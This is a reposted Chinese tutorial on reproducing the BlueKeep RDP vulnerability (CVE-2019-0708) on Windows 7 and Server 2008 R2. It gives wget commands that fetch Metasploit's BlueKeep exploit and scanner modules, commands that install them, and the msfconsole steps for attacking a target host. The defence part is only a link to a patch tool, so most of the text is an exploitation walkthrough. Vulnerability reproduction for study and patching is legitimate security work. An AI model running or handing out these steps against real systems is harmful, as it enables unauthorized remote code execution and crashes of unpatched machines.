经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
CVE 2019-0708漏洞复现防御修复
来源:cnblogs  作者:痱子﹑  时间:2019/9/10 10:52:46  对本文有异议

CVE-2019-0708

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

 

影响范围

 

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows 2003
  • Windows XP

首先更新我们的kaili

  1. apt-get install metasploit-framework

更新完成后

打开msfconsole 并未有利用程序只有检测工具

 

下载 exp

网盘:链接: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ 提取码: vh8h 

wget 下载
  1. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
  2. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  3. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
  4. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

把下载的文件

依次执行命令创建利用文件夹

  1. mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/
  2. mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
  3. mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
  4. cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
  5. cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
  6. cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  7. cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

重新打开msfconsole

重新加载

  1. reload_all

 

 我们导入

  1. use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

 这个exp 目前只有 windwos 7  /2008r2  而且是社区阉割版容易蓝屏

set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接

 

 当然也可以选其他的

show targets

直接run 

 

 之前复现过一次在复现就一执行就蓝屏 放一张朋友成功的

 

 而我的

 

 

漏洞修复

http://weishi.360.cn/mianyigongju.html

前往这个地址进行漏洞修复

 

 

 

 

原文链接:http://www.cnblogs.com/feizianquan/p/11481294.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号